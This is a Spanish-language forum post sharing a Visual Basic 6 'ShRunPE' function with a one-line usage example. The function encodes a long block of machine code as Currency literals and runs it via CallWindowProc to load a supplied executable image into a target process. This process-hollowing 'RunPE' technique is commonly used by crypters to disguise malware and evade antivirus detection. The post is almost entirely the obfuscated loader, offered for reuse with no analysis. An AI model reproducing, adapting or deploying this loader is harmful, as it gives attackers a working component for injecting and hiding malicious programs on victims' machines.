Dom Mayo 27, 2012 11:01 pm
- Código:
'Author : hamavb
'First cut : 02/03/2012 16:50
'Credits : karcrack & cobein
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
Dim Asm(160) As Currency
Asm(0) = 3011782251321.1488@
Asm(1) = 2842944510165.0021@
Asm(2) = 21475170.7244@
Asm(3) = 3039972698908.2734@
Asm(4) = 0.0108@
Asm(5) = 0@
Asm(6) = 0@
Asm(7) = 0@
Asm(8) = 0@
Asm(9) = 0@
Asm(10) = 770918988510973.1328@
Asm(11) = 609196292101137.4146@
Asm(12) = 318076019310180.1508@
Asm(13) = -857485367476117.5446@
Asm(14) = 399392180.8913@
Asm(15) = -706833318868351.5511@
Asm(16) = 6879439133396.1731@
Asm(17) = 763810498335316.3776@
Asm(18) = 388654513.6166@
Asm(19) = 98506041997.169@
Asm(20) = 24964196938431.9488@
Asm(21) = 22034984796.16@
Asm(22) = 305625529718164.0704@
Asm(23) = -410459675325501.5192@
Asm(24) = -172419915909691.6991@
Asm(25) = 150655457759015.8157@
Asm(26) = 763810498295053.1535@
Asm(27) = -334758189796557.4082@
Asm(28) = 763810498175933.6042@
Asm(29) = 769693235337619.0272@
Asm(30) = 658651445508203.5218@
Asm(31) = 93228415366.4744@
Asm(32) = 337544363.4688@
Asm(33) = -171181400105556.1333@
Asm(34) = -43143787013419.7499@
Asm(35) = -843073848963811.6758@
Asm(36) = 586115344006226.9449@
Asm(37) = 81903309047.8335@
Asm(38) = -170655782147139.7888@
Asm(39) = -296106572219468.926@
Asm(40) = -171744351251070.9758@
Asm(41) = 478565684273270.0365@
Asm(42) = 766128157362243.3@
Asm(43) = 763822153521118.6688@
Asm(44) = -5798494293561.088@
Asm(45) = 292876624.968@
Asm(46) = -303308424893800.028@
Asm(47) = 18687314406408.1922@
Asm(48) = -814921249263117.9264@
Asm(49) = 377936345376908.9026@
Asm(50) = 914455950214871.0911@
Asm(51) = 793381819255881.7282@
Asm(52) = 247979454486563.4385@
Asm(53) = -842580059571706.7544@
Asm(54) = 261953043.9225@
Asm(55) = 1351124663940.1355@
Asm(56) = -5728895679889.4336@
Asm(57) = 16435523184027.2177@
Asm(58) = 453291086712582.9632@
Asm(59) = -171181401297649.6638@
Asm(60) = 247984901789109.5093@
Asm(61) = 763853927511347.5304@
Asm(62) = 68764336814004.0238@
Asm(63) = 377880083361326.677@
Asm(64) = 58153857883.8015@
Asm(65) = -170634502550313.984@
Asm(66) = -6846382739763.962@
Asm(67) = 217285200.5584@
Asm(68) = 273152312385105.8024@
Asm(69) = 13733354816300.6466@
Asm(70) = 764000768607145.1648@
Asm(71) = 17395153563837.4458@
Asm(72) = -353751767489869.7902@
Asm(73) = 763363.3281@
Asm(74) = 392094642558210.6624@
Asm(75) = 764766522162398.7432@
Asm(76) = 126410412043612.3678@
Asm(77) = 27351427555.8027@
Asm(78) = 11706747011255.5776@
Asm(79) = -757276053642969.088@
Asm(80) = 360268856045024.0513@
Asm(81) = 749398978656993.7514@
Asm(82) = 12354147786351.6251@
Asm(83) = 769693219347778.7648@
Asm(84) = 414640788194904.6822@
Asm(85) = -171181417231738.2261@
Asm(86) = 276807880992725.4373@
Asm(87) = -842805239553082.2424@
Asm(88) = 37043291672.0721@
Asm(89) = 507392545273423.744@
Asm(90) = 769258247064186.1864@
Asm(91) = 68764336812483.5886@
Asm(92) = 360268875651665.0832@
Asm(93) = 749398978495932.017@
Asm(94) = 9651988025294.3009@
Asm(95) = 769693219347778.7648@
Asm(96) = 126410412042563.7942@
Asm(97) = -171294008471547.0205@
Asm(98) = -387449256181707.5451@
Asm(99) = 363299752439103.6175@
Asm(100) = -410459675325517.2888@
Asm(101) = -172926570866094.7199@
Asm(102) = -635688100489173.3787@
Asm(103) = 763810497261576.6376@
Asm(104) = 126410412042144.3634@
Asm(105) = -843073849903335.4646@
Asm(106) = 769693215773368.7817@
Asm(107) = 414640788193698.8194@
Asm(108) = 4951342415221.7475@
Asm(109) = 4636260512845.0048@
Asm(110) = -171631782205882.368@
Asm(111) = 507388721888441.1549@
Asm(112) = 31815578412492.9256@
Asm(113) = -872572382190820.8041@
Asm(114) = -286501654647065.8048@
Asm(115) = -428658242031485.5343@
Asm(116) = 3149895693349.6588@
Asm(117) = 22752143878461.8496@
Asm(118) = 10655039450.0177@
Asm(119) = 19434514006.2976@
Asm(120) = 2249161163731.9936@
Asm(121) = 590215178835617.3824@
Asm(122) = -171519195984216.1688@
Asm(123) = 334471606820667.3981@
Asm(124) = -6937148713125.7624@
Asm(125) = 3006614124114.7186@
Asm(126) = 457802337043140.7336@
Asm(127) = 34749504.673@
Asm(128) = -843073850212036.239@
Asm(129) = 536232810004781.4409@
Asm(130) = 699902812802672.356@
Asm(131) = -439434742750697.5805@
Asm(132) = 756604737376275.6714@
Asm(133) = 869968633553.1604@
Asm(134) = 450404738465.792@
Asm(135) = -7194094211452.1344@
Asm(136) = -1353710065018.4752@
Asm(137) = -439079356974065.2545@
Asm(138) = 566676858034822.4232@
Asm(139) = 32602016.4622@
Asm(140) = -7089160921751.4365@
Asm(141) = 410061545662244.4496@
Asm(142) = 617979275378688@
Asm(143) = 725985904952471.1762@
Asm(144) = 854193482151915.9435@
Asm(145) = -842159216757581.13@
Asm(146) = 457592490565246.7766@
Asm(147) = 17684902147728.7019@
Asm(148) = 643884385768544.0491@
Asm(149) = 622040492439682.185@
Asm(150) = 842553683379673.7879@
Asm(151) = 865826324060815.6483@
Asm(152) = 233132869356380.6979@
Asm(153) = -841594865717950.1309@
Asm(154) = -598169487549740.1085@
Asm(155) = 22006038477175.2068@
Asm(156) = 843978581769276.108@
Asm(157) = -840178504924852.7391@
Asm(158) = -836852911227146.7764@
Asm(159) = 643884385767650.3812@
Asm(160) = 328436.0538@
CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
End Function
Ejemplo de uso:
- Código:
ShRunPE "Target Exe Path", "PE data as byte()"
fuente: imsecure